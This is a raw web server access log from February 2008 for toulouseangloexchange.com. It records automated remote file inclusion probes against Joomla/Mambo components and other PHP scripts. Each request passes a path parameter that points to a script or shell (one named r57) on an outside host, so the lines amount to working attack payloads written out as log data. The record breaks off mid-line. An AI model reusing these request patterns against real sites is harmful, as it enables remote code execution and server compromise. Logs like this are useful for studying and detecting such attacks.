82.146.33.210 - - [25/Feb/2008:06:01:42 -0800] "GET /index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.toulouseangloexchange.com"
83.96.229.10 - - [25/Feb/2008:06:01:52 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://fairfuture.eu/WP/wp-content/.setan/lol/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.toulouseangloexchange.com"
83.96.229.10 - - [25/Feb/2008:06:01:52 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://fairfuture.eu/WP/wp-content/.setan/lol/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.toulouseangloexchange.com"
84.234.68.78 - - [25/Feb/2008:06:01:55 -0800] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.234.68.78 - - [25/Feb/2008:06:01:55 -0800] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
87.242.99.80 - - [25/Feb/2008:06:02:10 -0800] "GET //?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 200 919 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
87.242.99.80 - - [25/Feb/2008:06:02:10 -0800] "GET /logs//?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 200 3946 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
217.147.236.10 - - [25/Feb/2008:06:02:55 -0800] "GET /logs/index.php?option=com_calendar&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
87.238.165.117 - - [25/Feb/2008:06:05:40 -0800] "GET /logs/access_080127.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
87.238.165.117 - - [25/Feb/2008:06:05:41 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
87.238.165.117 - - [25/Feb/2008:06:05:41 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
81.17.35.69 - - [25/Feb/2008:06:05:56 -0800] "GET /logs/index.php?body=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
81.17.35.69 - - [25/Feb/2008:06:05:57 -0800] "GET /index.php?body=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
207.44.248.81 - - [25/Feb/2008:06:06:43 -0800] "GET /logs/access_080114.log/config.inc.php?path_escape=http://x.apescar.net/r1.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.44.248.81 - - [25/Feb/2008:06:06:44 -0800] "GET /config.inc.php?path_escape=http://x.apescar.net/r1.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.44.248.81 - - [25/Feb/2008:06:06:49 -0800] "GET /logs/config.inc.php?path_escape=http://x.apescar.net/r1.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.44.248.81 - - [25/Feb/2008:06:07:13 -0800] "GET /logs/access_080127.log/config.inc.php?path_escape=http://x.apescar.net/r1.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
83.143.84.82 - - [25/Feb/2008:06:08:02 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.indicce.com/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
212.227.96.89 - - [25/Feb/2008:06:08:41 -0800] "GET /logs/access_080211.log//script_path/templates/2blue/bodyTemplate.php?serverPath=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
212.227.96.89 - - [25/Feb/2008:06:08:42 -0800] "GET //script_path/templates/2blue/bodyTemplate.php?serverPath=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
212.227.96.89 - - [25/Feb/2008:06:08:42 -0800] "GET /logs//script_path/templates/2blue/bodyTemplate.php?serverPath=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
69.94.120.198 - - [25/Feb/2008:06:08:49 -0800] "GET /config.inc.php?path_escape=http://x.apescar.net/a.jpg?? HTTP/1.1" 404 275 "-